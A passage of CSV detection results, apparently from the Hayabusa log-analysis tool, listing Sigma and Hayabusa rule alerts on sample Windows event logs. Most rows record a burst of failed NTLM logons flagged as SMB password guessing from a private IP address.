+09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 01:34:31.100 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.588 
+09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 
+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 
